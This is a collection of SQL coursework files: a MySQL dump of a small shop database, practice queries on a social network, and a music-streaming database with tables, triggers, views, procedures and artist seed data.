/*!40111 SET @OLD_SQL_NOTES=@@SQL_NOTES, SQL_NOTES=0 */;
--
-- Table structure for table `categories`
--
DROP TABLE IF EXISTS `categories`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
/*!50503 SET character_set_client = utf8mb4 */;
CREATE TABLE `categories` (
`id` int NOT NULL AUTO_INCREMENT,
`name` varchar(100) DEFAULT NULL,
`description` varchar(255) DEFAULT NULL,
PRIMARY KEY (`id`)
) ENGINE=InnoDB AUTO_INCREMENT=23 DEFAULT CHARSET=utf8;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Dumping data for table `categories`
--
LOCK TABLES `categories` WRITE;
/*!40000 ALTER TABLE `categories` DISABLE KEYS */;
INSERT INTO `categories` VALUES (1,'Ibex','Capra ibex'),(2,'Ox, musk','Ovibos moschatus'),(3,'Turtle (unidentified)','unavailable'),(4,'Gonolek, burchell\'s','Laniaurius atrococcineus'),(5,'Phascogale, red-tailed','Phascogale calura'),(6,'Goose, greylag','Anser anser'),(7,'Fox, savanna','Dusicyon thous'),(8,'Lion, mountain','Felis concolor'),(9,'Crowned hawk-eagle','Spizaetus coronatus'),(10,'Bird, bare-faced go away','Lorythaixoides concolor'),(11,'Eurasian red squirrel','Sciurus vulgaris'),(12,'Ibis, puna','Plegadis ridgwayi'),(13,'Burmese brown mountain tortoise','Manouria emys'),(14,'Common zorro','Dusicyon thous'),(15,'Dabchick','Tachybaptus ruficollis'),(16,'Ibex','Capra ibex'),(17,'Moose','Alces alces'),(18,'Alpaca','Lama pacos'),(19,'Arctic hare','Lepus arcticus'),(20,'Three-banded plover','Charadrius tricollaris'),(21,'Marshbird, brown and yellow','Pseudoleistes virescens'),(22,'Tyrant flycatcher','Myiarchus tuberculifer');
/*!40000 ALTER TABLE `categories` ENABLE KEYS */;
UNLOCK TABLES;
--
-- Table structure for table `goods`
--
DROP TABLE IF EXISTS `goods`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
/*!50503 SET character_set_client = utf8mb4 */;
CREATE TABLE `goods` (
`id` int NOT NULL AUTO_INCREMENT,
`name` varchar(100) DEFAULT NULL,
`description` varchar(255) DEFAULT NULL,
`quantity` int DEFAULT NULL,
`price` decimal(10,2) DEFAULT NULL,
`categories_id` int NOT NULL,
PRIMARY KEY (`id`,`categories_id`),
KEY `fk_goods_categories_idx` (`categories_id`),
CONSTRAINT `fk_goods_categories` FOREIGN KEY (`categories_id`) REFERENCES `categories` (`id`)
) ENGINE=InnoDB AUTO_INCREMENT=2 DEFAULT CHARSET=utf8;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Dumping data for table `goods`
--
LOCK TABLES `goods` WRITE;
/*!40000 ALTER TABLE `goods` DISABLE KEYS */;
INSERT INTO `goods` VALUES (1,'dfghj','lalalalala',8,100500.00,13);
/*!40000 ALTER TABLE `goods` ENABLE KEYS */;
UNLOCK TABLES;
--
-- Temporary view structure for view `goodswithcategories`
--
DROP TABLE IF EXISTS `goodswithcategories`;
/*!50001 DROP VIEW IF EXISTS `goodswithcategories`*/;
SET @saved_cs_client = @@character_set_client;
/*!50503 SET character_set_client = utf8mb4 */;
/*!50001 CREATE VIEW `goodswithcategories` AS SELECT
1 AS `id`,
1 AS `name`,
1 AS `description`,
1 AS `categories_name`*/;
SET character_set_client = @saved_cs_client;
--
-- Table structure for table `orders`
--
DROP TABLE IF EXISTS `orders`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
/*!50503 SET character_set_client = utf8mb4 */;
CREATE TABLE `orders` (
`id` int NOT NULL,
`data` date DEFAULT NULL,
`address` varchar(255) DEFAULT NULL,
PRIMARY KEY (`id`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Dumping data for table `orders`
--
LOCK TABLES `orders` WRITE;
/*!40000 ALTER TABLE `orders` DISABLE KEYS */;
/*!40000 ALTER TABLE `orders` ENABLE KEYS */;
UNLOCK TABLES;
--
-- Table structure for table `orders_has_goods`
--
DROP TABLE IF EXISTS `orders_has_goods`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
/*!50503 SET character_set_client = utf8mb4 */;
CREATE TABLE `orders_has_goods` (
`orders_id` int NOT NULL,
`goods_id` int NOT NULL,
`goods_categories_id` int NOT NULL,
PRIMARY KEY (`orders_id`,`goods_id`,`goods_categories_id`),
KEY `fk_orders_has_goods_goods1_idx` (`goods_id`,`goods_categories_id`),
KEY `fk_orders_has_goods_orders1_idx` (`orders_id`),
CONSTRAINT `fk_orders_has_goods_goods1` FOREIGN KEY (`goods_id`, `goods_categories_id`) REFERENCES `goods` (`id`, `categories_id`),
CONSTRAINT `fk_orders_has_goods_orders1` FOREIGN KEY (`orders_id`) REFERENCES `orders` (`id`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Dumping data for table `orders_has_goods`
--
LOCK TABLES `orders_has_goods` WRITE;
/*!40000 ALTER TABLE `orders_has_goods` DISABLE KEYS */;
/*!40000 ALTER TABLE `orders_has_goods` ENABLE KEYS */;
UNLOCK TABLES;
--
-- Final view structure for view `goodswithcategories`
--
/*!50001 DROP VIEW IF EXISTS `goodswithcategories`*/;
/*!50001 SET @saved_cs_client = @@character_set_client */;
/*!50001 SET @saved_cs_results = @@character_set_results */;
/*!50001 SET @saved_col_connection = @@collation_connection */;
/*!50001 SET character_set_client = utf8mb4 */;
/*!50001 SET character_set_results = utf8mb4 */;
/*!50001 SET collation_connection = utf8mb4_0900_ai_ci */;
/*!50001 CREATE ALGORITHM=UNDEFINED */
/*!50013 DEFINER=`root`@`localhost` SQL SECURITY DEFINER */
/*!50001 VIEW `goodswithcategories` (`id`,`name`,`description`,`categories_name`) AS select `g`.`id` AS `id`,`g`.`name` AS `name`,`g`.`description` AS `description`,`c`.`name` AS `categories_id` from (`goods` `g` left join `categories` `c` on((`g`.`categories_id` = `c`.`id`))) */;
/*!50001 SET character_set_client = @saved_cs_client */;
/*!50001 SET character_set_results = @saved_cs_results */;
/*!50001 SET collation_connection = @saved_col_connection */;
/*!40103 SET TIME_ZONE=@OLD_TIME_ZONE */;
/*!40101 SET SQL_MODE=@OLD_SQL_MODE */;
/*!40014 SET FOREIGN_KEY_CHECKS=@OLD_FOREIGN_KEY_CHECKS */;
/*!40014 SET UNIQUE_CHECKS=@OLD_UNIQUE_CHECKS */;
/*!40101 SET CHARACTER_SET_CLIENT=@OLD_CHARACTER_SET_CLIENT */;
/*!40101 SET CHARACTER_SET_RESULTS=@OLD_CHARACTER_SET_RESULTS */;
/*!40101 SET COLLATION_CONNECTION=@OLD_COLLATION_CONNECTION */;
/*!40111 SET SQL_NOTES=@OLD_SQL_NOTES */;
-- Dump completed on 2020-12-11 20:15:44
<file_sep>-- Персональная страница пользователя
select
firstname,
lastname,
hometown,
(select filename from photos where id = u.photo_id) as 'personal_photo',
(select count(*) from (select initiator_user_id from friend_requests where target_user_id = u.id and status = 'approved'
union
select target_user_id from friend_requests where initiator_user_id = u.id and status = 'approved') as fr_list) as 'friends',
(select count(*) from friend_requests where target_user_id = u.id and status ='requested') as 'followers',
(select count(*) from photos where user_id = u.id) 'photos'
from users as u
where id = 21;
-- Список друзей пользователя 1 с указанием пола и возраста
select
firstname,
lastname,
timestampdiff(year, birthday, now()) as age,
case(gender)
when 'm' then 'Мужчина'
when 'f' then 'Женщина'
end as 'gender'
from users where id in (select * from (
select
case
when initiator_user_id = 1 and status = 'approved' then target_user_id
when target_user_id = 1 and status = 'approved' then initiator_user_id
end as friend_id
from friend_requests) as fr_list where friend_id is not null);
-- Получить id друзей пользователя номер 1
select initiator_user_id from friend_requests where target_user_id = 1 and status = 'approved'
union
select target_user_id from friend_requests where initiator_user_id = 1 and status = 'approved';
-- Получить id друзей пользователя номер 2
select * from (
select
case
when initiator_user_id = 1 and status = 'approved' then target_user_id
when target_user_id = 1 and status = 'approved' then initiator_user_id
end as friend_id
from friend_requests) as fr_list where friend_id is not null;
-- непрочитанные сообщения, адресованные пользователю (список)
select
(select concat(firstname, ' ', lastname) from users where id = m.from_user_id) from_user,
message,
create_at
from messages m
where to_user_id = 30 and is_read = 0;
-- кол-во непрочитанных сообщений, адресованных пользователю 30 от друзей
select
(select concat(firstname, ' ', lastname) from users where id = m.from_user_id) from_user,
count(*) as total_msg
from messages m
where
from_user_id in (select initiator_user_id from friend_requests where target_user_id = m.to_user_id and status = 'approved'
union
select target_user_id from friend_requests where initiator_user_id = m.to_user_id and status = 'approved')
and
to_user_id = 30
and is_read = 0
group by m.from_user_id order by total_msg desc;
-- среднее кол-во постов, опубликованных каждым пользователем
select avg(total_user_posts) from (select count(*) as total_user_posts from posts group by user_id) as total_users_posts_tbl;
-- архив новостей
select count(*) as total_news, monthname(created_at) as `month` from posts group by `month` order by total_news desc;
-- среднее количество групп у всех пользователей
select (select count(*) from users_communities)/(select count(*) from users);
-- кол-во пользователей на число групп с ненулевым числом пользлвателей
select (select count(*) from users)/(select count(distinct community_id ) from users_communities);
-- min max
select max(timestampdiff(year, birthday, now())) as age from users;
select timestampdiff(year, birthday, now()) as age from users order by age desc limit 1;
select gender, min(timestampdiff(year, birthday, now())) as age from users group by gender;
-- агрегирующие функции и null
select count(*) from photos;
select count(id) from photos;
select count(description) from photos;
-- Пусть задан некоторый пользователь. Из всех друзей этого пользователя найдите человека, который больше всех общался с нашим пользователем.
-- (если я правильно поняла, то общался это значит, что его сообщения читали)
select
(select concat(firstname, ' ', lastname) from users where id = m.from_user_id) from_user,
count(*) as total_msg
from messages m
where
from_user_id in (select initiator_user_id from friend_requests where target_user_id = m.to_user_id and status = 'approved'
union
select target_user_id from friend_requests where initiator_user_id = m.to_user_id and status = 'approved')
and
to_user_id = 1
and is_read = 1
group by m.from_user_id order by total_msg desc limit 1;
-- Подсчитать общее количество лайков, которые получили 10 самых молодых пользователей.
-- 1
select
concat(users.firstname, ' ', users.lastname) as username, timestampdiff(year, users.birthday, now()) as age,
(select p.user_id from postslikes where p.post_id = p2.id and p.likeexists = 1) user_id,
count(*) as total_postlikes
from posts as p2
join postslikes as p on p.post_id = p2.id
join users on users.id = p2.user_id
order by age, total_postlikes limit 10;
-- 2
select
concat(users.firstname, ' ', users.lastname) as username, timestampdiff(year, users.birthday, now()) as age,
(select postslikes.post_id
from postslikes
where postslikes.post_id = p2.id
and postslikes.likeexists = 1
group by postslikes.post_id) likedposts, count(*) as total_postlikes
from posts as p2
join users on users.id = p2.user_id
order by age, total_postlikes limit 10;
-- 3
select
concat(users.firstname, ' ', users.lastname) as username,
timestampdiff(year, users.birthday, now()) as age,
(select posts.user_id from posts
where postslikes.post_id = posts.id) user_id,
count(*) as total_postlikes
from postslikes where postslikes.likeexists = 1
join posts on postslikes.post_id = posts.id
join users on users.id = posts.user_id
order by age, total_postlikes limit 10;
-- ничего так и не заработало так, как бы мне хотелось =(
-- Определить кто больше поставил лайков (всего) - мужчины или женщины?
-- Найти 10 пользователей, которые проявляют наименьшую активность в использовании социальной сети.
<file_sep>drop database if exists music1;
create database music1;
use music1;
-- база данных медиаплеера типа Spotify
drop table if exists users;
create table users(
id serial primary key, -- serial = bigint unsigned not null auto_increment unique
firstname varchar(20) comment '<NAME>',
lastname varchar(20) comment '<NAME>',
email varchar(50) unique comment 'Электронная почта',
gender char(10),
phone varchar(20) unique,
loginname varchar(30) comment 'Короткое имя или никнейм пользователя',
pass char(20) comment '<PASSWORD>',
birthday date,
country varchar(40),
created_at datetime default now()
);
alter table users add index(phone);
alter table users add index(email);
alter table users add index(loginname);
drop table if exists artists;
create table artists(
id serial primary key,
artistsname varchar(50) comment 'Имя исполнителя/коллектива',
image_id bigint unsigned,
description text,
unique key(artistsname),
index(artistsname)
);
drop table if exists songs;
create table songs(
id serial primary key,
songname varchar(100) comment 'Название музыкального трека',
album_id bigint unsigned not null,
songnumberonalbum bigint unsigned not null comment 'Порядковый номер песни в оригинальном альбоме',
songduration varchar(10) comment 'Длительность песни',
songfile varchar(200) comment 'Ссылка на непосредственно музыкальный файл в хранилище/ либо сам файл',
genre varchar(50) comment 'Название музыкального жанра',
index(songname),
index(genre)
);
drop table if exists albums;
create table albums(
id serial primary key,
albumname varchar(50) comment 'Название альбома/EP',
coverimage varchar(200),
yearofrelease bigint,
created_at datetime default now(),
genre varchar(50) comment 'Название музыкального жанра альбома',
index(genre),
index(albumname)
);
alter table songs add foreign key (album_id) references albums(id);
drop table if exists playlists;
create table playlists(
id serial primary key,
playlistname varchar(50) comment 'Название плейлиста',
coverimage varchar(200),
description text,
created_by bigint unsigned not null,
created_at datetime default now(),
index(playlistname)
);
alter table playlists add foreign key (created_by) references users(id);
drop table if exists subscribes;
create table subscribes(
id serial primary key,
users_id bigint unsigned not null,
artist_id bigint unsigned not null,
subscribedornot char(1),
updated_at datetime default now(),
foreign key (users_id) references users(id),
foreign key (artist_id) references artists(id)
);
drop table if exists likedsongs;
create table likedsongs(
id serial primary key,
users_id bigint unsigned not null,
song_id bigint unsigned not null,
likedornot char(1),
updated_at datetime default now(),
foreign key (users_id) references users(id),
foreign key (song_id) references songs(id)
);
drop table if exists likedalbums;
create table likedalbums(
id serial primary key,
users_id bigint unsigned not null,
album_id bigint unsigned not null,
likedornot char(1),
updated_at datetime default now(),
foreign key (users_id) references users(id),
foreign key (album_id) references albums(id)
);
drop table if exists likedplaylists;
create table likedplaylists(
id serial primary key,
users_id bigint unsigned not null,
playlist_id bigint unsigned not null,
likedornot char(1),
updated_at datetime default now(),
foreign key (users_id) references users(id),
foreign key (playlist_id) references playlists(id)
);
-- таблица связующая песни с артистами для обеспечения связи многие ко многим
drop table if exists songperformers;
create table songperformers(
song_id bigint unsigned not null,
artist_id bigint unsigned not null,
primary key (song_id, artist_id),
foreign key (song_id) references songs(id),
foreign key (artist_id) references artists(id)
);
-- таблица связующая альбомы с артистами для обеспечения связи многие ко многим
drop table if exists artistsandalbums;
create table artistsandalbums(
album_id bigint unsigned not null,
artist_id bigint unsigned not null,
primary key (album_id, artist_id),
foreign key (album_id) references albums(id),
foreign key (artist_id) references artists(id)
);
-- таблица связующая песни с альбомами для обеспечения связи многие ко многим
drop table if exists songsonplaylists;
create table songsonplaylists(
song_id bigint unsigned not null,
playlist_id bigint unsigned not null,
songnumberonplaylist bigint unsigned not null, -- порядковый номер песни
primary key (song_id, playlist_id),
foreign key (song_id) references songs(id),
foreign key (playlist_id) references playlists(id)
);
-- таблица с прослушиваниями
drop table if exists streams;
create table streams(
id serial primary key,
users_id bigint unsigned not null,
song_id bigint unsigned not null,
album_id bigint unsigned not null,
listened_at datetime default current_timestamp,
foreign key (users_id) references users(id),
foreign key (song_id) references songs(id),
foreign key (album_id) references albums(id),
index(song_id)
);
<file_sep>use music1;
- триггер для исправления невалидной даты рождения
drop trigger if exists check_user_age_before_insert;
delimiter //
create trigger check_user_age_before_insert before insert on users
for each row
begin
if new.birthday > current_date() then
set new.birthday = current_date();
end if;
end//
delimiter ;
-- триггер на повторные порядковые номера в плейлистах
drop trigger if exists check_songsonplaylists_numbervalidity;
delimiter //
create trigger check_songsonplaylists_numbervalidity before insert on songsonplaylists
for each row
begin
declare currentplaylist int;
declare maxnumberonplaylist int;
if (new.songnumberonplaylist <> 1) and (playlist_id is not null) then
set currentplaylist := playlist_id;
select MAX(songnumberonplaylist) into maxnumberonplaylist from songsonplaylists where playlist_id = currentplaylist;
set new.songnumberonplaylist = maxnumberonplaylist + 1;
end if;
end//
delimiter ;
select MAX(songnumberonplaylist) from songsonplaylists where playlist_id = 15;
-- Представление, которое выводит пользовательские плейлисты.
create or replace view usersplaylists(id, playlistname, coverimage, description, created_by) as
select
p.id, p.playlistname, p.coverimage, p.description, u.loginname
from playlists as p
left join users as u
on p.created_by = u.id;
select * from usersplaylists;
-- Представление, которое сопоставляет песни с авторами и альбомами.
create or replace view songalbumartist(id, songname, albumname, artist_id, artistsname) as
select s.id, s.songname, a.albumname, sp.artist_id, ar.artistsname
from songperformers as sp
left join artists as ar
on sp.artist_id = ar.id
left join songs as s
on sp.song_id = s.id
left join albums as a
on s.album_id = a.id;
select id, songname, albumname, artistsname from songalbumartist order by id;
-- Представление, которое сопоставляет песни со стримов с авторами и альбомами, включая нулевые строки.
create or replace view allsongalbumartist(id, songname, albumname, artist_id, artistsname) as
select s.id, s.songname, a.albumname, sp.artist_id, ar.artistsname
from songperformers as sp
right join artists as ar
on sp.artist_id = ar.id
left join songs as s
on sp.song_id = s.id
left join albums as a
on s.album_id = a.id;
select * from allsongalbumartist;
-
-- Самые прослушиваемые песни.
create or replace view moststreamedsongs(song_id, countofstreams) as
select song_id, count(*) as countofstreams from streams group by song_id order by countofstreams desc;
select mss.countofstreams , s.songname, a.albumname, ar.artistsname
from moststreamedsongs as mss
left join songs as s
on mss.song_id = s.id
left join songperformers as sp
on mss.song_id = sp.song_id
left join artists as ar
on sp.artist_id = ar.id
left join albums as a
on s.album_id = a.id;
-- Самые прослушиваемые альбомы.
create or replace view moststreamedalbums(album_id, countofstreams) as
select album_id, count(*) as countofstreams from streams group by album_id order by countofstreams desc;
select msa.countofstreams , a.albumname, ar.artistsname
from moststreamedalbums as msa
left join albums as a
on msa.album_id = a.id
left join artistsandalbums as aa
on msa.album_id = aa.album_id
left join artists as ar
on aa.artist_id = ar.id;
-- самые залайканные плейлисты
create or replace view likedsongsview(song_id, countoflikes) as
select song_id, count(*) as countoflikes from likedsongs
where likedornot = '1' group by song_id order by countoflikes desc;
select lsv.countoflikes, s.songname, a.albumname, ar.artistsname
from likedsongsview as lsv
left join songperformers as sp
on lsv.song_id = sp.song_id
left join artists as ar
on sp.artist_id = ar.id
left join songs as s
on sp.song_id = s.id
left join albums as a
on s.album_id = a.id
limit 10;
-- самый популярные артисты по подпискам
select ar.artistsname, subscribes.artist_id, count(*) as countofsubscribers from subscribes
left join artists as ar
on subscribes.artist_id = ar.id
where subscribedornot = '1' group by artist_id order by countofsubscribers desc limit 10;
-- самые популярные плейлисты
select p.playlistname, p.description, u.loginname as creator, likedplaylists.playlist_id, count(*) as countoflikes from likedplaylists
left join playlists as p
on likedplaylists.playlist_id = p.id
left join users as u
on p.created_by = u.id
where likedornot = '1' group by playlist_id order by countoflikes desc limit 10;
-- подборки по жанру пост панка
select s.genre, s.id, s.songname, a.albumname, sp.artist_id, ar.artistsname
from songperformers as sp
left join artists as ar
on sp.artist_id = ar.id
left join songs as s
on sp.song_id = s.id
left join albums as a
on s.album_id = a.id
where s.genre = 'Post-punk';
-- самые залайканные песни в жанре пост-панк
create or replace view likedsongsview(song_id, countoflikes) as
select song_id, count(*) as countoflikes from likedsongs where likedornot = '1'
group by song_id order by countoflikes desc;
select lsv.countoflikes, s.genre, s.songname, a.albumname, ar.artistsname
from likedsongsview as lsv
left join songperformers as sp
on lsv.song_id = sp.song_id
left join artists as ar
on sp.artist_id = ar.id
left join songs as s
on sp.song_id = s.id
left join albums as a
on s.album_id = a.id
where s.genre = 'Post-punk' limit 10;
-- Самые прослушиваемые песни в жанре пост-панк
create or replace view moststreamedsongs(song_id, countofstreams) as
select song_id, count(*) as countofstreams from streams group by song_id order by countofstreams desc;
select mss.countofstreams, s.genre, s.songname, a.albumname, ar.artistsname
from moststreamedsongs as mss
left join songs as s
on mss.song_id = s.id
left join songperformers as sp
on mss.song_id = sp.song_id
left join artists as ar
on sp.artist_id = ar.id
left join albums as a
on s.album_id = a.id
where s.genre = 'Post-punk' limit 10;
-- новые релизы
select s.id, s.songname, a.albumname, sp.artist_id, ar.artistsname, a.yearofrelease
from songperformers as sp
left join artists as ar
on sp.artist_id = ar.id
left join songs as s
on sp.song_id = s.id
left join albums as a
on s.album_id = a.id
order by a.yearofrelease desc limit 20;
-- Процедура, позволяющая посмотреть подписки юзера
drop procedure if exists usersubscribeinfo;
delimiter //
create procedure usersubscribeinfo(in for_user_id int)
begin
select u.id as user_id, subscribes.artist_id, artists.artistsname, u.loginname
from subscribes
left join users as u
on subscribes.users_id = u.id
left join artists
on subscribes.artist_id = artists.id
where subscribedornot = '1' and u.id = for_user_id;
end//
delimiter ;
call usersubscribeinfo(200);
-- Процедура, позволяющая посмотреть стримы юзера
drop procedure if exists userstreamsinfo;
delimiter //
create procedure userstreamsinfo(in for_user_id int)
begin
select u.id, u.loginname, str.song_id, s.songname, a.albumname, ar.artistsname
from streams as str
left join users as u
on str.users_id = u.id
left join songs as s
on str.song_id = s.id
left join songperformers as sp
on str.song_id = sp.song_id
left join artists as ar
on sp.artist_id = ar.id
left join albums as a
on s.album_id = a.id
where u.id = for_user_id;
end//
delimiter ;
call userstreamsinfo(8);
-- Процедура, позволяющая посмотреть любимые песни
drop procedure if exists userfavoritesongsinfo;
delimiter //
create procedure userfavoritesongsinfo(in for_user_id int)
begin
select u.id as user_id, ls.song_id, s.songname, s.genre, u.loginname
from likedsongs as ls
left join users as u
on ls.users_id = u.id
left join songs as s
on ls.song_id = s.id
where likedornot = '1' and u.id = for_user_id;
end//
delimiter ;
call userfavoritesongsinfo(232);<file_sep>use shop;
show TABLES;
insert into categories (id, name, description) values (1, 'Ibex', 'Capra ibex');
insert into categories (id, name, description) values (2, 'Ox, musk', 'Ovibos moschatus');
insert into categories (id, name, description) values (3, 'Turtle (unidentified)', 'unavailable');
insert into categories (id, name, description) values (4, 'Gonolek, burchell''s', 'Laniaurius atrococcineus');
insert into categories (id, name, description) values (5, 'Phascogale, red-tailed', 'Phascogale calura');
insert into categories (id, name, description) values (6, 'Goose, greylag', 'Anser anser');
insert into categories (id, name, description) values (7, 'Fox, savanna', 'Dusicyon thous');
insert into categories (id, name, description) values (8, 'Lion, mountain', 'Felis concolor');
insert into categories (id, name, description) values (9, 'Crowned hawk-eagle', 'Spizaetus coronatus');
insert into categories (id, name, description) values (10, 'Bird, bare-faced go away', 'Lorythaixoides concolor');
insert into categories (id, name, description) values (11, 'Eurasian red squirrel', 'Sciurus vulgaris');
insert into categories (id, name, description) values (12, 'Ibis, puna', 'Plegadis ridgwayi');
insert into categories (id, name, description) values (13, 'Burmese brown mountain tortoise', 'Manouria emys');
insert into categories (id, name, description) values (14, 'Common zorro', 'Dusicyon thous');
insert into categories (id, name, description) values (15, 'Dabchick', 'Tachybaptus ruficollis');
insert into categories (id, name, description) values (16, 'Ibex', 'Capra ibex');
insert into categories (id, name, description) values (17, 'Moose', 'Alces alces');
insert into categories (id, name, description) values (18, 'Alpaca', 'Lama pacos');
insert into categories (id, name, description) values (19, 'Arctic hare', 'Lepus arcticus');
insert into categories (id, name, description) values (20, 'Three-banded plover', 'Charadrius tricollaris');
insert into categories (id, name, description) values (21, 'Marshbird, brown and yellow', 'Pseudoleistes virescens');
insert into categories (id, name, description) values (22, 'Tyrant flycatcher', 'Myiarchus tuberculifer');
-- 1. В базе данных shop и sample присутствуют одни и те же таблицы, учебной базы данных.
-- Переместите запись id = 1 из таблицы shop.users в таблицу sample.users. Используйте транзакции.
-- (PS буду использовать другие таблицы, т.к. они уже были созданы на одном из вебинаров и сути задания не поменяют)
create database if not exists sample;
use sample;
create table if not exists sample.categories AS SELECT * FROM shop.categories;
create table if not exists sample.goods AS SELECT * FROM shop.goods;
create table if not exists sample.orders AS SELECT * FROM shop.orders;
create table if not exists sample.orders_has_goods AS SELECT * FROM shop.orders_has_goods;
truncate table categories;
ALTER TABLE sample.categories MODIFY COLUMN id int auto_increment NOT null PRIMARY KEY;
insert into categories (name, description) values ('Painted stork', 'Mycteria leucocephala');
insert into categories (name, description) values ('Paca', 'Agouti paca');
insert into categories (name, description) values ('Chickadee, black-capped', 'Parus atricapillus');
insert into categories (name, description) values ('Common mynah', 'Acridotheres tristis');
insert into categories (name, description) values ('Elk, Wapiti', 'Cervus canadensis');
insert into categories (name, description) values ('Galapagos sea lion', 'Zalophus californicus');
insert into categories (name, description) values ('Albatross, galapagos', 'Diomedea irrorata');
insert into categories (name, description) values ('Starling, superb', 'Lamprotornis superbus');
insert into categories (name, description) values ('Lapwing (unidentified)', 'Vanellus sp.');
insert into categories (name, description) values ('Porcupine, crested', 'Hystrix cristata');
start transaction;
insert into sample.categories (name, description)
select name, description from shop.categories where shop.categories.id = 1;
commit;
-- Создайте представление, которое выводит название name товарной позиции из таблицы products и соответствующее название каталога name из таблицы catalogs.
use shop;
insert into goods (name, description, quantity, price, categories_id)
values ('dfghj', 'lalalalala', 8, 100500, 13);
CREATE OR REPLACE VIEW goodswithcategories(id, name, description, categories_name) as
SELECT
g.id, g.name, g.description, c.name as categories_id
FROM goods as g
left join categories as c
on g.categories_id = c.id;
select * from goodswithcategories;
<file_sep>insert into artists (artistsname, image_id, description) values ('<NAME>', 1, 'The Rolling Stones are an English rock band formed in London in 1962.');
insert into artists (artistsname, image_id, description) values ('<NAME>', 2, '<NAME> was an American guitarist, singer and songwriter.');
insert into artists (artistsname, image_id, description) values ('<NAME>', 3, '<NAME> was a psychedelic rock band from San Francisco. They were formed in 1965.');
insert into artists (artistsname, image_id, description) values ('<NAME>', 4, 'The Beatles were an English rock band, started in Liverpool, England in 1960. The members of the band were <NAME>, <NAME>, <NAME>, and <NAME>.');
insert into artists (artistsname, image_id, description) values ('<NAME>', 5, 'Led Zeppelin were an English rock band. The members were <NAME> (vocals), <NAME> (lead guitar), <NAME> (bass), and <NAME> (drums). ');
insert into artists (artistsname, image_id, description) values ('<NAME>', 6, 'Fleetwood Mac are a British-American rock band that formed in London, England in 1967.');
insert into artists (artistsname, image_id, description) values ('<NAME>', 7, '<NAME> was an American singer, musician and actor. He is often regarded as the most influential and most famous musician of the 20th century, and is widely regarded as a cultural icon.');
insert into artists (artistsname, image_id, description) values ('<NAME>', 8, '<NAME> is an American rock band formed in 1990 in Seattle, Washington. The bands lineup consists of founding members <NAME> (bass guitar), <NAME> (rhythm guitar), <NAME> (lead guitar), and <NAME>der (lead vocals, guitar), as well as <NAME> (drums)');
insert into artists (artistsname, image_id, description) values ('The Beach Boys', 9, 'The Beach Boys are an American rock band formed in Hawthorne, California in 1961. The groups original lineup consisted of brothers Brian, Dennis, and <NAME>, their cousin <NAME>, and friend <NAME>. ');
insert into artists (artistsname, image_id, description) values ('<NAME>', 10, '<NAME> (born <NAME>, May 24, 1941) is an American singer-songwriter, author and visual artist. Widely regarded as one of the greatest songwriters of all time, Dylan has been a major figure in popular culture for more than 50 years.');
insert into artists (artistsname, image_id, description) values ('<NAME> and the Heartbreakers', 11, '<NAME> and the Heartbreakers was an American rock band from Gainesville, Florida. Formed in 1976, the band originally comprised <NAME> (lead singer, guitar), <NAME> (lead guitarist), <NAME> (bass guitar), <NAME> (drums), and <NAME> (keyboards). ');
insert into artists (artistsname, image_id, description) values ('<NAME>', 12, '<NAME> (born <NAME>; February 26, 1932 – September 12, 2003) was an American singer, songwriter, musician, and actor.');
insert into artists (artistsname, image_id, description) values ('<NAME>', 13, '<NAME> (September 23, 1930 – June 10, 2004) was an American singer, songwriter, pianist, and composer.');
insert into artists (artistsname, image_id, description) values ('<NAME>', 14, '<NAME> (8 January 1947 – 10 January 2016), known professionally as <NAME>, was an English singer-songwriter and actor. He was a leading figure in the music industry and is regarded as one of the most influential musicians of the 20th century. ');
insert into artists (artistsname, image_id, description) values ('<NAME>', 15, '<NAME> (n? Judkins; born May 13, 1950), known professionally as <NAME>, is an American singer, songwriter, musician and record producer. A prominent figure in popular music during the second half of the 20th century, Wonder is one of the most successful songwriters and musicians. ');
insert into artists (artistsname, image_id, description) values ('Prince', 16, '<NAME> (June 7, 1958 – April 21, 2016) was an American singer-songwriter, musician, record producer, dancer, and actor. He is widely regarded as one of the greatest musicians of his generation.');
insert into artists (artistsname, image_id, description) values ('<NAME>', 17, '<NAME>, OM (6 February 1945 – 11 May 1981) was a Jamaican singer, songwriter, and musician. Considered one of the pioneers of reggae, his musical career was marked by fusing elements of reggae, ska, and rocksteady, as well as his distinctive vocal and songwriting style.');
insert into artists (artistsname, image_id, description) values ('<NAME>', 18, '<NAME> (March 25, 1942 – August 16, 2018) was an American singer, songwriter, actress, pianist, and civil rights activist.');
insert into artists (artistsname, image_id, description) values ('The Who', 19, 'The Who are an English rock band formed in London in 1964. Their classic lineup consisted of lead singer <NAME>, guitarist and singer <NAME>, bass guitarist and singer <NAME>, and drummer <NAME>. ');
insert into artists (artistsname, image_id, description) values ('<NAME>', 20, '<NAME> (October 18, 1926 – March 18, 2017) was an American singer, songwriter and guitarist, and one of the pioneers of rock and roll music.');
insert into artists (artistsname, image_id, description) values ('<NAME>', 21, '<NAME>, CBE (born 30 March 1945) is an English rock and blues guitarist, singer, and songwriter.');
insert into artists (artistsname, image_id, description) values ('<NAME>', 22, '<NAME> were an American folk-rock duo consisting of singer-songwriter <NAME> and singer <NAME>. One of the best-selling music groups of the 1960s');
insert into artists (artistsname, image_id, description) values ('The Velvet Underground', 23, 'The Velvet Underground was an American rock band formed in New York City in 1964 by singer/guitarist Lou Reed, multi-instrumentalist <NAME>, guitarist <NAME>, and drummer <NAME>. ');
insert into artists (artistsname, image_id, description) values ('<NAME>', 24, '<NAME> (August 29, 1958 – June 25, 2009) was an American singer, songwriter, and dancer. Dubbed the "King of Pop", he is regarded as one of the most significant cultural figures of the 20th century. Through stage and video performances, he popularized complicated dance techniques such as the moonwalk, to which he gave the name, and the robot.');
insert into artists (artistsname, image_id, description) values ('The Black Angels', 25, 'The Black Angels are an American psychedelic rock band from Austin, Texas.');
insert into artists (artistsname, image_id, description) values ('The Doors', 26, 'The Doors were an American rock band formed in Los Angeles in 1965, with vocalist <NAME>, keyboardist <NAME>, guitarist <NAME>, and drummer <NAME>. ');
